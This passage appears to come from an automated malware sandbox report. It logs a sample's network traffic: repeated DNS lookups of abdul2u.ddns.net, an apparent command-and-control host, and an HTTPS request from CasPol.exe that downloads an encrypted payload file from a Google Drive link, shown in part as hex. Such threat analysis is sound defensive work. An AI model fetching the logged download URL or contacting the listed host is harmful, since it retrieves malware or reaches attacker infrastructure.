                                                                                    Nov 23, 2021 14:42:42.621246099 CET53627911.1.1.1192.168.11.20
                                                                                    Nov 23, 2021 14:42:43.132735014 CET5063153192.168.11.201.1.1.1
                                                                                    Nov 23, 2021 14:42:43.187539101 CET53506311.1.1.1192.168.11.20
                                                                                    Nov 23, 2021 14:42:43.417829990 CET6475953192.168.11.201.1.1.1
                                                                                    Nov 23, 2021 14:42:43.442408085 CET53647591.1.1.1192.168.11.20
                                                                                    Nov 23, 2021 14:43:32.985069036 CET6312053192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:43:32.998544931 CET53631208.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:43:39.303298950 CET6003753192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:43:39.315953970 CET53600378.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:43:45.630029917 CET6331753192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:43:45.639533043 CET53633178.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:44:41.540146112 CET5022353192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:44:41.553090096 CET53502238.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:44:47.850816965 CET6449653192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:44:47.862178087 CET53644968.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:44:54.162298918 CET5563353192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:44:54.175637960 CET53556338.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:45:50.118494034 CET5217153192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:45:50.131793976 CET53521718.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:45:56.445137978 CET5384353192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:45:56.457565069 CET53538438.8.8.8192.168.11.20
                                                                                    Nov 23, 2021 14:46:02.771969080 CET6164753192.168.11.208.8.8.8
                                                                                    Nov 23, 2021 14:46:02.783946991 CET53616478.8.8.8192.168.11.20

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Nov 23, 2021 14:40:00.900080919 CET192.168.11.201.1.1.10x39c7Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:01.589149952 CET192.168.11.201.1.1.10xb405Standard query (0)doc-00-68-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:03.796792030 CET192.168.11.208.8.8.80x7068Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:10.239578962 CET192.168.11.208.8.8.80xdb4cStandard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:16.609045029 CET192.168.11.208.8.8.80xe9e5Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:41:15.225421906 CET192.168.11.208.8.8.80x3ecfStandard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:41:21.563921928 CET192.168.11.208.8.8.80xc1cStandard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:41:27.925158024 CET192.168.11.208.8.8.80x9d76Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:24.367233038 CET192.168.11.208.8.8.80x2cb2Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:30.678195953 CET192.168.11.208.8.8.80x1bc0Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:37.005242109 CET192.168.11.208.8.8.80x5e92Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:42.611356974 CET192.168.11.201.1.1.10x8645Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:43.132735014 CET192.168.11.201.1.1.10x8da1Standard query (0)doc-04-3g-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:43.417829990 CET192.168.11.201.1.1.10x41c1Standard query (0)docs.google.comA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:43:32.985069036 CET192.168.11.208.8.8.80xf193Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:43:39.303298950 CET192.168.11.208.8.8.80x7ea8Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:43:45.630029917 CET192.168.11.208.8.8.80x39aStandard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:44:41.540146112 CET192.168.11.208.8.8.80x6407Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:44:47.850816965 CET192.168.11.208.8.8.80x38c0Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:44:54.162298918 CET192.168.11.208.8.8.80xfa90Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:45:50.118494034 CET192.168.11.208.8.8.80xfaecStandard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:45:56.445137978 CET192.168.11.208.8.8.80x1d60Standard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:46:02.771969080 CET192.168.11.208.8.8.80x818bStandard query (0)abdul2u.ddns.netA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Nov 23, 2021 14:40:00.909338951 CET1.1.1.1192.168.11.200x39c7No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:01.625597954 CET1.1.1.1192.168.11.200xb405No error (0)doc-00-68-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:01.625597954 CET1.1.1.1192.168.11.200xb405No error (0)googlehosted.l.googleusercontent.com142.250.181.225A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:03.810297966 CET8.8.8.8192.168.11.200x7068No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:10.252780914 CET8.8.8.8192.168.11.200xdb4cNo error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:40:16.622270107 CET8.8.8.8192.168.11.200xe9e5No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:41:15.238456011 CET8.8.8.8192.168.11.200x3ecfNo error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:41:21.576734066 CET8.8.8.8192.168.11.200xc1cNo error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:41:27.938915014 CET8.8.8.8192.168.11.200x9d76No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:24.379199982 CET8.8.8.8192.168.11.200x2cb2No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:30.697715998 CET8.8.8.8192.168.11.200x1bc0No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:37.016489029 CET8.8.8.8192.168.11.200x5e92No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:42.621246099 CET1.1.1.1192.168.11.200x8645No error (0)drive.google.com142.250.186.174A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:43.187539101 CET1.1.1.1192.168.11.200x8da1No error (0)doc-04-3g-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:43.187539101 CET1.1.1.1192.168.11.200x8da1No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:42:43.442408085 CET1.1.1.1192.168.11.200x41c1No error (0)docs.google.com172.217.168.14A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:43:32.998544931 CET8.8.8.8192.168.11.200xf193No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:43:39.315953970 CET8.8.8.8192.168.11.200x7ea8No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:43:45.639533043 CET8.8.8.8192.168.11.200x39aNo error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:44:41.553090096 CET8.8.8.8192.168.11.200x6407No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:44:47.862178087 CET8.8.8.8192.168.11.200x38c0No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:44:54.175637960 CET8.8.8.8192.168.11.200xfa90No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:45:50.131793976 CET8.8.8.8192.168.11.200xfaecNo error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:45:56.457565069 CET8.8.8.8192.168.11.200x1d60No error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)
                                                                                    Nov 23, 2021 14:46:02.783946991 CET8.8.8.8192.168.11.200x818bNo error (0)abdul2u.ddns.net194.147.140.112A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • drive.google.com
                                                                                    • doc-00-68-docs.googleusercontent.com
                                                                                    • doc-04-3g-docs.googleusercontent.com
                                                                                    • docs.google.com

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.11.2049820142.250.184.206443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:40:01 UTC0OUTGET /uc?export=download&id=1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2021-11-23 13:40:01 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Tue, 23 Nov 2021 13:40:01 GMT
                                                                                    Location: https://doc-00-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4bnhn9ga855bgu8d3ldr74vnelc1d/1637674800000/14482752613682931361/*/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download
                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                    Content-Security-Policy: script-src 'nonce-Waa9sSEAjK3NCCKBDNVAGw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                    Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                    Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    Server: GSE
                                                                                    Set-Cookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE; expires=Wed, 25-May-2022 13:40:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Accept-Ranges: none
                                                                                    Vary: Accept-Encoding
                                                                                    Connection: close
                                                                                    Transfer-Encoding: chunked
                                                                                    2021-11-23 13:40:01 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 36 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 37 61 67 34
                                                                                    Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4
                                                                                    2021-11-23 13:40:01 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.11.2049821142.250.181.225443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:40:01 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ag4bnhn9ga855bgu8d3ldr74vnelc1d/1637674800000/14482752613682931361/*/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Host: doc-00-68-docs.googleusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2021-11-23 13:40:01 UTC2INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ADPycdvHsUCMMD-40P_18RAGcBNoVWnjNepXiKjAKphxNAjxe_Jgtk0OQZaYvOiX5krbKs703bqBs-xnAQIKL6pGxBzV_HHhcg
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                    Access-Control-Allow-Methods: GET,OPTIONS
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Disposition: attachment;filename="Sons and daughters5.bin";filename*=UTF-8''Sons%20and%20daughters5.bin
                                                                                    Content-Length: 207936
                                                                                    Date: Tue, 23 Nov 2021 13:40:01 GMT
                                                                                    Expires: Tue, 23 Nov 2021 13:40:01 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=nwHAxw==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close
                                                                                    2021-11-23 13:40:01 UTC6INData Raw: f5 ef 03 ce 5b 17 1f b1 0d 53 b4 ca ba 68 c0 6b 7a 9c 07 d9 1d 84 3c db 83 31 26 fe f8 41 08 ad dc b4 9a ce d4 b8 40 c3 2a 51 84 6e f5 33 f4 30 15 23 68 53 32 68 88 da dc 09 9f a6 2a db 9c b0 23 81 90 de ba be 78 45 ac 2a 11 0a 23 57 c8 77 1f 1e d2 50 b3 b6 8b 48 51 60 7a bb 5f fa 2f 24 e1 fd b7 95 61 49 dc 83 5a 43 f5 53 f0 c8 eb 22 f4 0b 0e 31 5f 29 e1 cd 93 69 82 e5 c9 5b 86 f0 ad f9 7f 2f 3e 70 43 45 73 18 e6 7f db 38 b6 35 4b 85 c2 bc 0a 7b 55 21 c3 d9 99 7c 6e c9 3c f7 45 5d bc a4 76 85 da a0 13 5b db a2 37 84 46 3d 6e 0a 45 d9 ed 64 a1 a9 db 56 0d 26 13 10 ef 4e 7d 91 f5 d4 65 af f8 dc 9d 69 9d 04 1b b0 f7 ab eb 7e 69 99 18 08 98 a8 48 17 97 12 f5 96 e3 03 6d 01 e5 4e 3e 95 8b ab 5b f1 2f 85 23 fb 24 70 d6 88 05 72 74 08 d0 7c 2c 79 40 88 76 64 0a
                                                                                    Data Ascii: [Shkz<1&A@*Qn30#hS2h*#xE*#WwPHQ`z_/$aIZCS"1_)i[/>pCEs85K{U!|n<E]v[7F=nEdV&N}ei~iHmN>[/#$prt|,y@vd
                                                                                    2021-11-23 13:40:01 UTC9INData Raw: d1 6e 3d 77 af 6d 6a 73 40 0a 61 3d 9a 81 f1 05 99 a9 d0 f4 c7 f2 fb d6 bf 68 ca 14 2e 53 71 3e bb 47 9a cc 7d c0 7a 77 e3 fc 08 e6 75 b8 94 60 89 b4 d5 f5 ca 32 8d a5 b3 0e 50 4d b4 cc 1b 73 0c a9 b4 3e 39 b8 c3 bb 21 52 42 b3 5b 80 c3 59 0c ad 19 8b 29 0c 6f 42 ff 2e 67 4f 76 95 7a fd b7 c2 89 93 7f e7 9c d0 64 57 c1 29 d5 a7 c2 04 36 f3 90 8f ea 11 d5 c7 18 06 b1 ef 7a 14 28 8d b8 51 bf 60 18 4f ef ff 95 9d 34 30 eb 7b 07 26 8d 75 bc aa 71 e3 84 03 d1 98 e3 6c 59 0c 2c 40 fd 15 b7 db 54 40 be ab 24 7b 6a 2a b7 51 bb 7c ea 02 2b 79 2c a0 ea 46 c7 c5 e6 91 e4 ff a0 3f ee 1f cf d7 01 07 e6 6b 95 9a 02 46 0a df 15 bf 38 68 ac 35 a6 b7 70 78 7a 7f 53 64 ac 88 e6 ce 1b a8 0d ea ea ba 47 e9 be af e1 fb 60 dc 9d 56 a1 f3 25 f6 47 81 cc dc 56 26 38 46 96 bb 49
                                                                                    Data Ascii: n=wmjs@a=h.Sq>G}zwu`2PMs>9!RB[Y)oB.gOvzdW)6z(Q`O40{&uqlY,@T@${j*Q|+y,F?kF8h5pxzSdG`V%GV&8FI
                                                                                    2021-11-23 13:40:01 UTC13INData Raw: 2c 12 c2 b8 04 c6 27 8c 28 99 a4 38 7e d5 bc 67 a1 8d 00 83 dd 97 33 34 ef 6a e1 86 f4 b2 56 2e fb cd ca c6 94 d4 9c 38 9a 8c 51 9e e0 0d 23 52 e2 3c cd 11 fe d2 5b 5f d9 fa 8a e7 42 27 12 01 4f 52 47 42 ba f8 c2 b2 0a f5 64 a0 91 f9 97 1b 1a d7 f6 3b 3a 42 fa a8 b5 4a 7d 97 4c 57 54 1b 6e d2 85 08 08 0e 01 16 76 4d 3c 84 b4 8f e6 2a 1a 21 66 2f 11 e7 19 1f ad e5 e7 a2 5c a0 83 0d b5 d5 52 b7 97 1e f5 ee 40 9b 28 6b 72 d4 cd a9 9e f7 51 48 5e b7 23 23 59 48 91 8f b8 c4 e7 12 b2 5e 41 38 4c 90 6d 8c fe 90 fb 90 8e cc e2 31 49 ea f0 39 0d 6c c5 95 2c 3b 99 45 1b c2 19 08 50 7c 86 10 39 3b 22 46 10 40 bc 10 21 5a b7 97 18 04 f4 0a 65 34 9c 90 f7 19 ad cd 91 41 c7 f8 db e3 92 fa c0 3f da 54 50 32 d4 d6 9a cc 77 e6 68 7c cb 49 11 fd 52 9f 53 c5 a0 a6 de 0f f1
                                                                                    Data Ascii: ,'(8~g34jV.8Q#R<[_B'ORGBd;:BJ}LWTnvM<*!f/\R@(krQH^##YH^A8Lm1I9l,;EP|9;"F@!Ze4A?TP2wh|IRS
                                                                                    2021-11-23 13:40:01 UTC17INData Raw: 2c 38 e1 c7 74 2c d4 f3 f9 28 84 d3 39 3c 4e 7e 78 21 b1 f7 ad 84 98 69 99 f2 12 bb b8 65 3e 4e 12 f5 54 e4 1a 45 84 e4 4e 34 b8 b4 80 ca 1d 05 68 24 fb f7 53 06 96 2f 8d 74 08 96 54 f3 59 40 82 19 8e 0a a1 7c 51 b0 59 67 a9 0e 03 4a b7 3b d7 57 30 ce 9d e8 b8 8e 07 a3 4a 75 3e 15 b7 12 df 5b 77 65 4a ec ca c6 50 d9 02 18 f2 04 39 07 f7 29 80 95 f9 33 7d d9 0a f3 b1 8c ff f5 96 05 10 49 4f cf af e2 71 ee b1 7e f1 f9 0c 0b fa 05 19 cc f5 dc b2 cf a0 c5 7a 82 82 d6 7e f2 22 e3 67 cd 38 4a 25 23 8c 28 4a 48 ce e9 5f 52 a9 15 9e a3 fa d9 26 81 c2 69 44 7d e6 69 43 91 f0 0f 72 dd ff 6f 10 85 cf bf 03 16 04 ea bc c5 0e d5 27 87 59 91 ab 26 56 20 94 e5 a7 a5 ae 9a f5 7a 2e 19 ee 61 e6 84 4b b6 76 34 f1 cb e1 ed 10 ff 6f 14 b0 a1 d6 16 e0 07 32 55 f1 19 fa 3d d5
                                                                                    Data Ascii: ,8t,(9<N~x!ie>NTEN4h$S/tTY@|QYgJ;W0Ju>[weJP9)3}IOq~z~"g8J%#(JH_R&iD}iCro'Y&V z.aKv4o2U=
                                                                                    2021-11-23 13:40:01 UTC18INData Raw: 8f 03 d7 9a b6 d6 0b 42 2d 9b e9 0f 74 b9 c7 d2 59 50 6a 47 71 a6 e2 87 03 85 2f 8d 02 d9 62 69 15 27 6f 20 89 97 6f e9 b2 86 ae e8 60 f5 9e fc b7 51 ea 20 df 8b 3f 26 5b 17 87 a2 f3 31 a7 b1 18 07 b5 e6 02 94 04 86 98 53 fa 0b 18 4f fe e5 b6 b6 53 16 c0 88 47 26 8d 67 f2 db 71 d3 80 2e d0 b2 cb 6d 58 0e 3a 5c fd 1c 87 8b 4c 57 a0 82 13 5b 3f a8 91 7a 4b 49 f5 0a 3e 4e 16 4c 91 5f c1 dd cf 98 d4 e0 9b 1b f9 5b a5 dd 2a e9 c7 66 4a 56 a1 49 2e c2 0d 4a 38 58 aa 32 2a fb 70 78 7b 55 18 7a 81 88 b3 c1 02 a8 07 ce 8d 98 bc f4 b0 7b 15 d1 64 e2 3c 7b b3 d3 76 ed 46 81 c2 01 6e 1e 3d 00 b0 d4 2e 29 c7 fb ac 55 9f 0d c8 a2 b6 d6 91 db 00 d8 91 0a 78 45 ae 02 70 0a dc a2 16 74 ab 35 34 7a b2 a6 8b 48 11 60 72 bb 00 9d 2f 00 a7 fd b7 94 62 79 d5 83 4d 43 f5 53 f0
                                                                                    Data Ascii: B-tYPjGq/bi'o o`Q ?&[1SOSG&gq.mX:\LW[?zKI>NL_[*fJVI.J8X2*px{Uz{d<{vFn=.)UxEpt54zH`r/byMCS
                                                                                    2021-11-23 13:40:01 UTC19INData Raw: fa dd 43 94 da 41 a9 a3 c1 69 44 6f c4 23 1e 14 dc b5 16 80 28 99 04 30 56 26 6c db 2c 39 23 ac 4c 91 c0 26 56 2c 94 06 a7 a5 a2 5d de 96 05 ff ce 4c e6 be 5a b2 56 24 d6 cb 8b af 9e db 29 12 9c a5 e5 ae e4 07 af 7f f1 1a 8c 39 d5 c2 25 4b c0 d7 8c bf 65 34 1b 13 4b 35 81 6c b1 d9 31 93 30 21 73 d7 ff f1 0d 37 5c b8 18 31 29 4c a8 92 9e 49 73 ad a5 28 62 64 6e d3 f0 2f 1c 0f 00 73 f2 69 19 a6 e9 87 f1 78 1e 04 6f 01 07 ce 86 8d 4f 2b bc 04 5c a0 8f 28 7f f9 52 b1 bb 10 45 ee 4a 4f 38 6a 72 1b f7 7c b6 46 5b 36 65 a4 26 59 6a 60 76 8b aa cb e2 aa cc 6f 4b 57 28 b8 67 87 d3 97 2c a6 ae cc 1c 31 49 ea 85 4e 15 4a c7 a7 37 36 fa 5b 33 37 34 c6 88 5a 20 1a c7 2b 1c 27 10 5b d9 ad 22 56 96 ad 3b 4f 41 16 65 3e 8f 9b dc 0f 8b f2 b9 d0 81 f8 d1 f1 94 84 b4 3f c4
                                                                                    Data Ascii: CAiDo#(0V&l,9#L&V,]LZV$)9%Ke4K5l10!s7\1)LIs(bdn/sixoO+\(REJO8jr|F[6e&Yj`voKW(g,1INJ76[374Z +'["V;OAe>?
